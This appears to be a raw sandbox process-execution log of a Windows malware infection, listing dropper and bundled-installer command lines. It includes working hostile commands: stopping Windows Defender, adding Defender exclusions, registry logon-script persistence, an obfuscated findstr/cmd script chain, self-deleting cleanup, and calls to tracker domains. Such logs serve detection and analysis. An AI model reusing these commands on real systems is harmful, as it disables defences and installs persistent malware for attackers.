C:\Windows\SysWOW64\WerFault.exe -pss -s 880 -p 6152 -ip 6152
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6240 -s 296
C:\Users\Admin\AppData\Roaming\5318543.exe
"C:\Users\Admin\AppData\Roaming\5318543.exe"
C:\Users\Admin\AppData\Roaming\4464286.exe
"C:\Users\Admin\AppData\Roaming\4464286.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 7956 -ip 7956
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 6316 -ip 6316
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 900 -p 6184 -ip 6184
C:\Users\Admin\AppData\Roaming\4717428.exe
"C:\Users\Admin\AppData\Roaming\4717428.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6316 -s 312
C:\Users\Admin\AppData\Roaming\4158939.exe
"C:\Users\Admin\AppData\Roaming\4158939.exe"
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 288
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 908 -p 7520 -ip 7520
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Users\Admin\Documents\MErB0oiECFInvOnN0pMZsfJQ.exe
"C:\Users\Admin\Documents\MErB0oiECFInvOnN0pMZsfJQ.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 0FFB766CFAD2B8EEBC1FA3E4273DB98E C
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Users\Admin\AppData\Local\Temp\is-MC5C6.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-MC5C6.tmp\Setup.exe" /silent /subid=720
C:\Users\Admin\AppData\Local\Temp\is-KEK3J.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-KEK3J.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 452
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 844 -p 6552 -ip 6552
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\is-4J0BN.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4J0BN.tmp\Setup.tmp" /SL5="$2045C,17361482,721408,C:\Users\Admin\AppData\Local\Temp\is-KEK3J.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp" /SL5="$2045E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-MC5C6.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-CMSRA.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 276
C:\Users\Admin\AppData\Local\Temp\5AA1.exe
C:\Users\Admin\AppData\Local\Temp\5AA1.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 836 -p 4996 -ip 4996
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403838 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 292
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-CMSRA.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding D65BC8E04F1EF4709EB32F6824596A23 C
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 8509C7C744AA63035D60300FADEC6A49 C
C:\Users\Admin\AppData\Local\Temp\83C5.exe
C:\Users\Admin\AppData\Local\Temp\83C5.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 844 -p 3872 -ip 3872
C:\Program Files\Uninstall Information\QAEOFVAETU\ultramediaburner.exe
"C:\Program Files\Uninstall Information\QAEOFVAETU\ultramediaburner.exe" /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\41-f4462-e95-46ea2-f67ab5203337b\Maeveseqaeba.exe
"C:\Users\Admin\AppData\Local\Temp\41-f4462-e95-46ea2-f67ab5203337b\Maeveseqaeba.exe"
C:\Users\Admin\AppData\Local\Temp\is-0LL2G.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0LL2G.tmp\ultramediaburner.tmp" /SL5="$3053C,281924,62464,C:\Program Files\Uninstall Information\QAEOFVAETU\ultramediaburner.exe" /VERYSILENT
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding CC1F53D7F85920F3B7B6D299CD5980C6
C:\Users\Admin\AppData\Local\Temp\00-a79cc-ea8-70996-092bf3e5830ae\Numaetetegae.exe
"C:\Users\Admin\AppData\Local\Temp\00-a79cc-ea8-70996-092bf3e5830ae\Numaetetegae.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3872 -s 2324
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-9L90V.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-9L90V.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403838 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5164 -ip 5164
C:\Users\Admin\AppData\Local\Temp\A9EC.exe
C:\Users\Admin\AppData\Local\Temp\A9EC.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5164 -s 2472
C:\Users\Admin\AppData\Local\Temp\is-CMSRA.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-CMSRA.tmp\{app}\vdi_compiler"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 600 -p 3400 -ip 3400
C:\Users\Admin\AppData\Local\Temp\B826.exe
C:\Users\Admin\AppData\Local\Temp\B826.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3400 -s 2320
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403838 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 7596 -ip 7596
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7596 -s 2460
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 6244 -ip 6244
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 288
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\EA23.exe
C:\Users\Admin\AppData\Local\Temp\EA23.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ps5lxaxw.sjs\GcleanerEU.exe /eufive & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jctrnkq0.13m\installer.exe /qn CAMPAIGN="654" & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b5l4ub4a.v11\ufgaa.exe & exit
C:\Users\Admin\AppData\Local\Temp\jctrnkq0.13m\installer.exe
C:\Users\Admin\AppData\Local\Temp\jctrnkq0.13m\installer.exe /qn CAMPAIGN="654"
C:\Users\Admin\AppData\Local\Temp\686.exe
C:\Users\Admin\AppData\Local\Temp\686.exe
C:\Users\Admin\AppData\Local\Temp\8AA.exe
C:\Users\Admin\AppData\Local\Temp\8AA.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449&param=721
C:\Users\Admin\AppData\Local\Temp\E77.exe
C:\Users\Admin\AppData\Local\Temp\E77.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa41e946f8,0x7ffa41e94708,0x7ffa41e94718
C:\Users\Admin\AppData\Local\Temp\ps5lxaxw.sjs\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\ps5lxaxw.sjs\GcleanerEU.exe /eufive
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1rfv4ayr.evh\anyname.exe & exit
C:\Users\Admin\AppData\Local\Temp\1rfv4ayr.evh\anyname.exe
C:\Users\Admin\AppData\Local\Temp\1rfv4ayr.evh\anyname.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5fyqerig.fmw\gcleaner.exe /mixfive & exit
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\Users\Admin\AppData\Local\Temp\8c6fb647-a92e-4570-b278-032daed86e54\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\8c6fb647-a92e-4570-b278-032daed86e54\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8c6fb647-a92e-4570-b278-032daed86e54\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
C:\Users\Admin\AppData\Local\Temp\2106.exe
C:\Users\Admin\AppData\Local\Temp\2106.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 73AE46420040090803390E770D37AEF1 C
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8c6fb647-a92e-4570-b278-032daed86e54\test.bat"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2580 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2264 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1
C:\Windows\system32\sc.exe
sc stop windefend
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3832 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3848 /prefetch:1
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 9300 -ip 9300
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{266bc9aa-95a3-0042-910c-721f65887538}\oemvista.inf" "9" "4d14a44ff" "0000000000000158" "WinSta0\Default" "0000000000000168" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 864 -p 9548 -ip 9548
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 888 -p 10880 -ip 10880
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9548 -s 296
C:\Users\Admin\AppData\Local\Temp\1rfv4ayr.evh\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\1rfv4ayr.evh\anyname.exe" -q
C:\Users\Admin\AppData\Local\Temp\5fyqerig.fmw\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\5fyqerig.fmw\gcleaner.exe /mixfive
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uspzfnjo.jyj\autosubplayer.exe /S & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9300 -s 292
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2044 /prefetch:1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\EA23.exe" -Force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10880 -s 880
C:\Users\Admin\AppData\Local\Temp\EA23.exe
C:\Users\Admin\AppData\Local\Temp\EA23.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 12132 -ip 12132
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000010C" "fff3"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 12132 -s 836
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3384 /prefetch:8
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe" -start
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1c0,0x1f0,0x7ffa41e946f8,0x7ffa41e94708,0x7ffa41e94718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3384 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 888 -p 12240 -ip 12240
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 12240 -s 296
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\jctrnkq0.13m\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\jctrnkq0.13m\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403838 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:1
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=72 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3972 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im MSBuild.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & del C:\ProgramData\*.dll & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
C:\Windows\SysWOW64\taskkill.exe
taskkill /im MSBuild.exe /f
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe" -agent 0
C:\Windows\SysWOW64\cmd.exe
